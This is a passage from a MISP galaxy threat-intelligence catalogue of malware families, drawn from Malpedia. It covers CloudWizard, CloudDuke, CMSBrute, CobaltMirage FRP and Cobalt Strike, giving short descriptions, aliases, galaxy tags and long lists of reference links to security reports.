https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/

https://labs.k7computing.com/?p=21725Lokesh

https://sansorg.egnyte.com/dl/ALlvwK6fp0

https://forensicitguy.github.io/guloader-executing-shellcode-callbacks/

https://any.run/cybersecurity-blog/deobfuscating-guloader/

CloudWizard

The tag is: misp-galaxy:malpedia="CloudWizard"

CloudWizard is also known as:

Table 3168. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudwizard

https://securelist.com/cloudwizard-apt/109722/

CloudDuke

F-Secure describes CloudDuke as a malware toolset known to consist of, at least, a downloader, a loader and two backdoor variants. The CloudDuke downloader will download and execute additional malware from a preconfigured location. Interestingly, that location may be either a web address or a Microsoft OneDrive account. Both CloudDuke backdoor variants support simple backdoor functionality, similar to SeaDuke. While one variant will use a preconfigured C&C server over HTTP or HTTPS, the other variant will use a Microsoft OneDrive account to exchange commands and stolen data with its operators.

The tag is: misp-galaxy:malpedia="CloudDuke"

CloudDuke is also known as:

  • CloudLook

  • MiniDionis

Table 3169. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke

https://www.f-secure.com/weblog/archives/00002822.html

CMSBrute

The tag is: misp-galaxy:malpedia="CMSBrute"

CMSBrute is also known as:

Table 3170. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute

https://securelist.com/the-shade-encryptor-a-double-threat/72087/

CobaltMirage FRP

This Go written malware was observed during campaign of COBALT MIRAGE; it includes FRP (Fast Reverse Proxy) published by fatedier on GitHub (https://github.com/fatedier/frp) and other projects additionally.

The tag is: misp-galaxy:malpedia="CobaltMirage FRP"

CobaltMirage FRP is also known as:

Table 3173. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cobaltmirage_tunnel

https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us

https://www.deepinstinct.com/blog/iranian-threat-actor-continues-to-develop-mass-exploitation-tools

Cobalt Strike

Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.

The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.

The tag is: misp-galaxy:malpedia="Cobalt Strike"

Cobalt Strike is also known as:

  • Agentemis

  • BEACON

  • CobaltStrike

  • cobeacon

Table 3174. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike

https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a

https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/

https://security.macnica.co.jp/blog/2022/05/iso.html

https://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups

https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/

https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation

https://blog.group-ib.com/apt41-world-tour-2021

https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966

https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx

https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/

https://embee-research.ghost.io/decoding-a-cobalt-strike-vba-loader-with-cyberchef/

https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services

https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis

https://ak100117.medium.com/analyzing-cobalt-strike-powershell-payload-64d55ed3521b

https://twitter.com/TheDFIRReport/status/1359669513520873473

https://www.prevailion.com/what-wicked-webs-we-unweave/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf

https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach

https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html

https://www.secureworks.com/research/threat-profiles/tin-woodlawn

https://blog.cobaltstrike.com/

https://isc.sans.edu/diary/27308

https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader

https://www.youtube.com/watch?v=C733AyPzkoc

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf

https://www.macnica.net/file/mpression_automobile.pdf

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

http://www.secureworks.com/research/threat-profiles/gold-kingswood

https://us-cert.cisa.gov/ncas/alerts/aa20-275a

https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf

https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/

https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e

https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf

https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/

https://experience.mandiant.com/trending-evil-2/p/1

https://www.mandiant.com/resources/spear-phish-ukrainian-entities

https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/

https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/

https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734

https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/

https://www.youtube.com/watch?v=WW0_TgWT2gs

https://www.accenture.com/us-en/blogs/security/ransomware-hades

https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7

https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/bb-ebook-finding-beacons-in-the-dark.pdf

https://www.inde.nz/blog/different-kind-of-zoombomb

https://skyblue.team/posts/scanning-virustotal-firehose/

https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates

https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/

https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf

https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/

https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021

https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/

https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html

https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html

https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/

https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/

https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://lab52.io/blog/beyond-appearances-unknown-actor-using-apt29s-ttp-against-chinese-users/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html

https://www.ic3.gov/Media/News/2021/210823.pdf

https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/

https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments

https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf

https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive

https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html

https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/

https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/

https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html

https://cert.gov.ua/article/37704

https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/

https://twitter.com/VK_Intel/status/1294320579311435776

https://thedfirreport.com/2022/03/07/2021-year-in-review/

http://blog.nsfocus.net/murenshark

https://redcanary.com/blog/intelligence-insights-december-2021

https://www.cobaltstrike.com/support

https://github.com/sophos-cybersecurity/solarwinds-threathunt

https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html

https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day—​cve-2021-40444—​hits-windows—​tr.html

https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis

https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://twitter.com/alex_lanstein/status/1399829754887524354

https://www.youtube.com/watch?v=FC9ARZIZglI

https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

https://blog.morphisec.com/vmware-identity-manager-attack-backdoor

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf

https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors

https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://bmcder.com/blog/extracting-cobalt-strike-from-windows-error-reporting

https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-011/

https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf

https://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html

https://isc.sans.edu/diary/rss/27176

https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/

https://asec.ahnlab.com/en/31811/

https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/

https://www.mandiant.com/media/12596/download

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html

https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/

https://401trg.com/burning-umbrella/ [https://401trg.com/burning-umbrella/ ]

https://www.istrosec.com/blog/apt-sk-cobalt/

https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/

https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications

https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader

https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a

https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/

https://embee-research.ghost.io/ghidra-entropy-analysis-locating-decryption-functions/

https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664

https://cert.gov.ua/article/703548

https://blog.exatrack.com/melofee/

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://zero.bs/cobaltstrike-beacons-analyzed.html

https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/

https://isc.sans.edu/diary/26752

https://twitter.com/felixw3000/status/1521816045769662468

https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf

https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html

https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/

https://blog.group-ib.com/opera1er-apt

https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py

https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack

https://redcanary.com/blog/grief-ransomware/

https://twitter.com/ffforward/status/1324281530026524672

https://x.com/embee_research/status/1737325167024738425?s=46

https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing

https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/

https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/

https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf

https://www.secureworks.com/research/darktortilla-malware-analysis

https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/

https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/

https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ

https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks

https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks

https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike

https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/

https://twitter.com/MsftSecIntel/status/1522690116979855360

https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware

https://blog.nviso.eu/2022/03/22/cobalt-strike-overview-part-7/

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/

https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks

https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f

https://blog.talosintelligence.com/2021/11/attackers-use-domain-fronting-technique.html

https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/

https://us-cert.cisa.gov/ncas/alerts/aa21-265a

https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/

https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://twitter.com/cglyer/status/1480742363991580674

https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/

https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf

https://asec.ahnlab.com/en/34549/

https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20

https://cyber.wtf/2022/03/23/what-the-packer/

https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/

https://www.youtube.com/watch?v=6SDdUVejR2w

https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/

https://malcat.fr/blog/lnk-forensic-and-config-extraction-of-a-cobalt-strike-beacon/

https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/

https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671

https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html

https://securelist.com/apt-trends-report-q2-2020/97937/

https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/

https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes

https://www.youtube.com/watch?v=GfbxHy6xnbA

https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass

https://twitter.com/TheDFIRReport/status/1356729371931860992

https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/

https://attack.mitre.org/groups/G0096

https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems

https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf

https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/

https://awakesecurity.com/blog/catching-the-white-stork-in-flight/

https://web.br.de/interaktiv/ocean-lotus/en/

https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html

https://malware-traffic-analysis.net/2021/09/29/index.html

https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/

https://msrc.microsoft.com/blog/2022/10/hunting-for-cobalt-strike-mining-and-plotting-for-fun-and-profit/

https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/

https://www.youtube.com/watch?v=borfuQGrB8g

https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html

https://www.malware-traffic-analysis.net/2023/10/03/index.html

https://www.recordedfuture.com/solardeflection-c2-infrastructure-used-by-nobelium-in-company-brand-misuse/

https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://insight-jp.nttsecurity.com/post/102ho8o/operation-restylink

https://www.qurium.org/alerts/targeted-malware-against-crph/

https://embee-research.ghost.io/shodan-censys-queries/

https://kienmanowar.wordpress.com/2022/06/04/quicknote-cobaltstrike-smb-beacon-analysis-2/

https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/

https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility

https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5

https://malwarelab.eu/posts/fin6-cobalt-strike/

https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/

https://unit42.paloaltonetworks.com/cobalt-strike-memory-analysis/

https://www.mandiant.com/resources/evolution-of-fin7

https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/

https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/

https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A

https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview

https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads

https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot

https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/

http://www.secureworks.com/research/threat-profiles/gold-drake

https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929

https://binary.ninja/2022/07/22/reverse-engineering-cobalt-strike.html

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://quake.360.cn/quake//reportDetail?id=5fc6fedd191038c3b25c4950

https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/

https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/

https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/

https://wbglil.gitbook.io/cobalt-strike/

https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/

https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire

https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/

https://www.trendmicro.com/en_us/research/20/i/u-s—​justice-department-charges-apt41-hackers-over-global-cyberattacks.html

https://www.secureworks.com/research/threat-profiles/bronze-president

https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel

https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware

https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/

https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/

https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/

https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf

https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf

https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/

https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/

https://assets.virustotal.com/reports/2021trends.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/harvester-new-apt-attacks-asia

https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf

https://thedfirreport.com/2021/01/31/bazar-no-ryuk/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3

https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader

https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/

https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt

https://blog.group-ib.com/REvil_RaaS

https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64

https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/

https://community.riskiq.com/article/f0320980

https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/

https://videos.didierstevens.com/2022/09/06/an-obfuscated-beacon-extra-xor-layer/

https://www.esentire.com/blog/hacker-infrastructure-used-in-cisco-breach-discovered-attacking-a-top-workforce-management-corporation-russias-evil-corp-gang-suspected-reports-esentire

https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html

https://netresec.com/?b=214d7ff

https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/

https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt

https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware

https://embee-research.ghost.io/ghidra-basics-shellcode-analysis/

https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811

https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/

https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf

https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html

https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/

https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine

https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon

https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/

https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md

https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html

https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021

https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise

https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html

https://twitter.com/redcanary/status/1334224861628039169

https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575

https://michaelkoczwara.medium.com/cobalt-strike-powershell-payload-analysis-eecf74b3c2f7

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns

https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.mandiant.com/media/10916/download

https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf

https://securelist.com/apt-luminousmoth/103332/

https://twitter.com/vikas891/status/1385306823662587905

https://thedfirreport.com/2022/04/25/quantum-ransomware/

https://marcoramilli.com/2022/05/10/a-malware-analysis-in-ru-au-conflict/

https://community.riskiq.com/article/0bcefe76

https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

https://www.trendmicro.com/en_us/research/23/b/earth-zhulong-familiar-patterns-target-southeast-asian-firms.html

https://twitter.com/GossiTheDog/status/1438500100238577670

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta

https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/

